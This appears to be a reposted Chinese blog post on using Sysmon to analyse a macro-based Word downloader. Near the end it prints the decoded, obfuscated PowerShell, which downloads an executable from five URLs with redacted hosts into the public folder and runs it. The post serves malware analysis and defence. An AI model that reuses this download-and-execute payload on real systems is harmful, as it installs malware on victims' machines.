使用Sysmon分析宏病毒(Macros Downloader)

样本为一个Word文件,Virustotal地址:


https://www.virustotal.com/#/file/f8aede78ad92bd28f5f699b677d7d5fd362c8be846d03f009e1f04a9c3d15101/detection

动态分析可以获取Callback Server地址,但不能确定是所有Callback Server。静态分析查看Macros代码时候,发现混淆比较复杂,很难拿到最终执行的明文Powershell代码。根据经验Macros经常要么执行CMD要么执行Powershell,Sysmon又可以记录命令执行及其参数。

Sysmon 默认安装

 sysmon -accepteula  –i -n

打开Doc文件,Enable Macros,执行宏,观察Sysmon日志,获得powershell命令:

851155-20180315133332549-950064760.png

Decode 获得明文代码,恶意文件为Downloader以及确定5个URL:


iex($nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' 
https://<evil>/BaW2l63/@http://<evil>/8W0D/@http://<evil>/8Y5S9/@http://<evil>/0Z6zA5Y/@http://<evil>/7fGM/'.Split('@');$SDC = $env:public + '\' + $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}catch{}})

End

转载于:https://www.cnblogs.com/xiaoxiaoleo/p/8573088.html

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注